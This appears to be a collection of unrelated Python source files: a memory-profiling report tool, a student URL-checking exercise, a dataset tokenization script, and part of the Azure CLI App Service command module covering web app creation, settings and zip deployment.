@return Tuple containing test case name, timestamp and scenario
'''
rest, f = os.path.split(path)
testcase = os.path.split(rest)[-1]
f = self.remove_ext(f, self._snapshot_exts)
timestamp, scenario = f.split("_")
return (testcase, timestamp, scenario)
def _run_smem(self, fpath, unit):
# Expects smem.arm to be in same folder as mem_profile.py
smem_path = os.path.join(os.path.dirname(__file__), './smem.arm')
cmd = 'python2 %s -S %s -t %s --export aps >/dev/null 2>&1' \
% (smem_path, fpath, unit)
try:
# Try processing memory snapshot asynchronously
from multiprocessing import Process
p = Process(target=os.system, args=(cmd,))
p.start()
return p
except ImportError as e:
# Process memory snapshot synchronously
os.system(cmd)
return None
def _load_aps_files(self):
print '\tLoading %d APS file(s):' % len(self._aps_files)
for aps_tuple in self._aps_files:
process, aps_path, test, timestamp, scenario = aps_tuple
if process:
# Wait until APS file is generated if needed
process.join()
print '\t\ttest(%s) timestamp(%s) scenario(%s) aps_path(%s)' \
% (test, timestamp, scenario, aps_path)
try:
with open(aps_path, 'r') as aps_file:
aps_map = json.load(aps_file)
ttuple = ((test, timestamp, scenario), aps_map)
self._aps_lst.append(ttuple)
except IOError as e:
print '\t\tFile not found: ' + str(e.message)
def _analyze_sorted_files(self, dpath, unit_kb=True):
if not os.path.exists(dpath):
raise Exception('%s folder does not exist! ' \
'Did you run \'capture\' command before?' % dpath)
print '\tScanning: %s' % dpath
for f in sorted(os.listdir(dpath)):
fpath = os.path.join(dpath, f)
if not os.path.isfile(fpath) \
or not fpath.endswith(self._snapshot_exts):
print '\t\tIgnoring unknown file: ' + fpath
continue
print '\t\t%s' % fpath
test, timestamp, scenario = self.get_info_from_path(fpath)
# Process snapshots and generate final merged output to APS
unit = '' if unit_kb else '-k'
process = self._run_smem(fpath, unit)
aps_path = self.remove_ext(fpath, self._snapshot_exts) + '.aps'
self._aps_files.append((process, aps_path, test, timestamp, scenario))
def analyze_folder(self):
'''
Traverses folder searching for test cases to analyze looking for
memory snapshots in sorted order and convert them to APS output
@param unit_kb If True output in 'kB' and otherwise in 'Mb'
'''
if not self._pg:
# Scan folder for subfolders and then files
for d in sorted(os.listdir(self._folder)):
dpath = os.path.join(self._folder, d)
if not os.path.isdir(dpath):
continue
self._analyze_sorted_files(dpath)
else:
# Scan folder for files
dpath = os.path.join(self._folder, self._pg)
self._analyze_sorted_files(dpath)
self._load_aps_files()
def merge_results(self):
'''
Merge results from multiple test cases consolidating into
a .profile file for APS
@return List containing the output filenames as TestCase.profile
'''
if not self._aps_lst:
print "No elements in APS list"
return
print 'Merging %d APS file(s)' % len(self._aps_lst)
# Specify changes in placement of some APS keys in final .profile
scenario_key = 'Scenario'
aps_unit_key = 'APS_Unit'
to_be_submaps = {
aps_unit_key : (),
'APS_SystemMemory': ('System', 'Memory'),
'APS_AllProcesses': ('Process', 'AllProcesses', 'Memory')
}
for elem in self._aps_lst:
test_case, ts, scenario = (elem[0][0], elem[0][1], elem[0][2])
self._all_tc_map[test_case] = self._all_tc_map.get(test_case, {})
tc_map = self._all_tc_map[test_case]
tc_map[scenario_key] = tc_map.get(scenario_key, [])
tc_map[scenario_key].append( { 'Name': scenario, 'TS': ts } )
submap = elem[1]
unit = submap.get(aps_unit_key, 'KB').upper()
for k1 in submap:
if k1 in to_be_submaps:
# Handle custom hierarchy for some APS keys
if not to_be_submaps[k1]:
continue
level = [ tc_map ]
for elem in to_be_submaps[k1]:
level[-1][elem] = level[-1].get(elem, {})
level.append(level[-1][elem])
level = [ level[-1] ]
inner_map = level[-1]
else:
# Then it's the memory information of a specific process
level = tc_map['Process'] = tc_map.get('Process', {})
level[k1] = level.get(k1, {})
level[k1]['Memory'] = level[k1].get('Memory', {})
inner_map = level[k1]['Memory']
# inner_map is the final level where data finally needs to be
for k2 in submap[k1]:
inner_map[k2] = inner_map.get(k2, {'Unit': unit, 'Values': []})
inner_map[k2]['Values'].append(submap[k1][k2])
flist = []
for test_case in self._all_tc_map:
fname = os.path.join(self._folder, test_case + '.profile')
with open(fname, 'w') as f:
json.dump(self._all_tc_map[test_case], f, sort_keys=True \
, indent=4, separators=self.SEPARATORS)
flist.append(fname)
return flist
def generate_perfmeta_json(self, comm):
'''
Generate perfmeta.json report file
@return String containing the path to perfmeta.json report file
'''
print 'Generating perfmeta.json'
pinfo = PlatInfoFactory.makePlatInfo(comm)
perfmeta = {
'targetDevice': {
'HWName': pinfo.get_hw_name(),
'OSName': pinfo.get_os_name(),
'BuildInfo': pinfo.get_build_info(),
'CodeName': pinfo.get_code_name(),
'ModelName': pinfo.get_model_name()
},
'data': []
}
pm_data = perfmeta['data']
for test_case in self._all_tc_map:
print '\ttest_case(%s)' % str(test_case)
value = self._all_tc_map[test_case]
# Traverse keys in ['System']['Memory']['Used_Total']['Values']
for k in ('System', self._pt, self._pv, 'Values'):
value = value.get(k)
if not value:
break
else:
# All keys found, proceed
if not value or value < 1 or not isinstance(value, list):
continue
print '\t\tvalue[s] = ' + str(value)
if len(value) > 1:
# Last value minus first value
value = value[-1] - value[0]
else:
value = value[0]
print '\t\tvalue = ' + str(value)
data_map = {
'PerfType' : self._pt,
'PerfGroup': test_case,
'PerfValue': round(float(value), 1)
}
pm_data.append(data_map)
fname = os.path.join(self._folder, 'perfmeta.json')
with open(fname, 'w') as f:
json.dump(perfmeta, f, sort_keys=True, indent=4,
separators=self.SEPARATORS)
def capture(args):
return MemoryProfiler.capture_snapshot(
args.comm, args.workdir, args.PerfGroup, args.Scenario)
def report(args):
memp = MemoryProfiler(args.workdir, args.perftype, args.perfgroup, args.perfvalue)
memp.analyze_folder()
ret = memp.merge_results()
print 'Generated output files: %r' % ret
memp.generate_perfmeta_json(args.comm)
return os.EX_OK
def parse_args():
'''
Parse program arguments using argparse.
@param Implicit program arguments via sys.argv
@return Tuple containing the argument parser and its parsed arguments
'''
dft_perf_type = 'Memory'
dft_work_dir = '/tmp/pmtrace/memory-profiling'
dft_perf_value = 'Used_Total'
description = 'Capture a memory snapshot or analyze captured snapshots'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-d', '--workdir', action='store',
help='Working directory\n(default: %s)' \
% dft_work_dir, default=dft_work_dir)
# ssh options
ssh_grp = parser.add_argument_group()
ssh_grp.add_argument('-i', '--ip', action='store',
help='ip address to a device')
ssh_grp.add_argument('--user', action='store', default='root',
help='username for connecting to a target device\n(default: root)')
ssh_grp.add_argument('--pw', action='store', default=None,
help='password for connecting to a target device\n(default: None)')
ssh_grp.add_argument(
'--port', action='store', default=22, help='Port (default:22)')
# Subparsers
subparsers = parser.add_subparsers(help='For sub-command help, use (-h) after command',
dest='command')
# Capture
parser_capture = subparsers.add_parser('capture', \
help='Capture memory snapshot for test case in some scenario\n'\
'Needs options (-g) for test case and (-s) for scenario')
parser_capture.add_argument('PerfGroup', action='store', help='PerfGroup (test case name)')
parser_capture.add_argument('Scenario', action='store', help='Scenario name')
parser_capture.set_defaults(func=capture)
# Report
parser_report = subparsers.add_parser('report', \
help='Generate APS report based on captured memory snapshots\n'\
'Use option (-g) for test case, otherwise scans all')
parser_report.add_argument('-g', '--perfgroup', action='store',
help='PerfGroup (test case name)')
parser_report.add_argument('-t', '--perftype', action='store',
help='PerfType (default: %s)' \
% dft_perf_type, default=dft_perf_type)
parser_report.add_argument('-v', '--perfvalue', action='store',
help='PerfValue (default: %s)' \
% dft_perf_value, default=dft_perf_value)
parser_report.set_defaults(func=report)
args = parser.parse_args()
return (parser, args)
def main():
''' Main function '''
parser, args = parse_args()
args.comm = CommanderFactory.makeCommander(args.ip, args.port, args.user, args.pw)
if args.command in ('capture', 'report'):
return args.func(args)
parser.print_help()
return os.EX_USAGE
if __name__ == '__main__':
sys.exit(main())
|
answer.py | #!/usr/bin/python3
import os, sys
import threading
import requests
os.system("clear")
os.system("ls")
#1
print(os.getpid())
#2
print(os.getloadavg())
#3
load_avg=os.getloadavg()
print("cpu count: ",os.cpu_count())
load_avg = os.getloadavg()
print("load_avg: "load_avg[1])
if(os.cpu_count()-load_avg[1]<1):
sys.exit()
#4
arr = ['https://api.github.com', 'http://bilgisayar.mu.edu.tr/',
'https://www.python.org/', 'http://akrepnalan.com/ceng2034',
'https://github.com/caesarsalad/wow']
def link(string):
x = requests.get(string)
y=x.status_code
if (100 <y< 300 ):
print("The url is valid: " + string)
else:
print("The url is invalid " + string)
link(arr[0])
thread1 = threading.Thread(target=link, args=("https://api.github.com",))
thread2 = threading.Thread(target=link, args=("http://bilgisayar.mu.edu.tr/",))
thread3 = threading.Thread(target=link, args=('https://www.python.org/',))
thread4 = threading.Thread(target=link, args=('http://akrepnalan.com/ceng2034',))
thread5 = threading.Thread(target=link, args=('https://github.com/caesarsalad/wow',))
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
|
generate_token.py | import os
import sys
import h5py
import cPickle
import argparse
import multiprocessing
import time
import numpy as np
reload(sys)
sys.setdefaultencoding('utf8')
from utils import normalize, Tokenizer
parser = argparse.ArgumentParser(description='Tokenize datasets')
parser.add_argument('--split', default='train', help='train, dev, test')
parser.add_argument('--tagger', default='okt', help='whitespace, okt, mecab')
parser.add_argument('--num_chunk', type=int, default=9, help='the number of chunks (train: 9, dev: 1, test: 2)')
parser.add_argument('--vocab_root', default='/base/data', help='folder to load bmsd_vocab.cPickle')
parser.add_argument('--data_root', default='/data', help='folder to load input chunks')
parser.add_argument('--output_root', default='/data/output/tmp', help='folder to save tokenized chunks')
args = parser.parse_args()
if not os.path.exists(args.output_root):
os.makedirs(args.output_root)
columns = ['product', 'brand', 'model']
bmsd_vocab = cPickle.loads(open(os.path.join(args.vocab_root, "bmsd_vocab.cPickle")).read())
input_format = "%s.chunk.%02d"
output_format = "%s_tokenized.chunk.%02d"
def append(h_in, h_out, split):
tkn = Tokenizer(args.tagger)
data = h_in[split] # train, dev, test
cur_size = len(data['product'])
bcateid = data['bcateid'][()]
mcateid = data['mcateid'][()]
scateid = data['scateid'][()]
dcateid = data['dcateid'][()]
def get_label(i, vocab_type="bmsd"):
b = bcateid[i]
m = mcateid[i]
s = scateid[i]
d = dcateid[i]
if split == 'train':
if vocab_type == "bmsd":
y = bmsd_vocab['%s>%s>%s>%s' % (b, m, s, d)]
else:
raise
return y
else:
return -1
h_out['img_feat'] = data['img_feat'][:]
h_out['pid'] = data['pid'][:]
h_out['label'] = [get_label(i, vocab_type="bmsd") for i in range(cur_size)]
for col in columns:
result = []
for i in range(cur_size):
txt = normalize(data[col][i], col_type=col)
words = tkn.tokenize(txt)
result.append(np.string_(words))
h_out[col] = np.array(result, dtype="S1000")
def convert(i):
chunk_id = i+1
print("[*] Convert %s %02d" % (args.split, chunk_id))
start = time.time()
h_in = h5py.File(os.path.join(args.data_root, input_format % (args.split, chunk_id)), 'r')
h_out = h5py.File(os.path.join(args.output_root, output_format % (args.split, chunk_id)), 'w')
append(h_in, h_out, split=args.split)
print("[*] Done %02d %.2fsec" % (chunk_id, time.time() - start))
def main():
workers = []
for i in range(args.num_chunk):
t = multiprocessing.Process(target=convert, args=(i,))
workers.append(t)
t.start()
for worker in workers:
worker.join()
if __name__ == '__main__':
print('args', args)
main()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_VERSION_DEFAULT, RUNTIME_STACKS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'az webapp list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
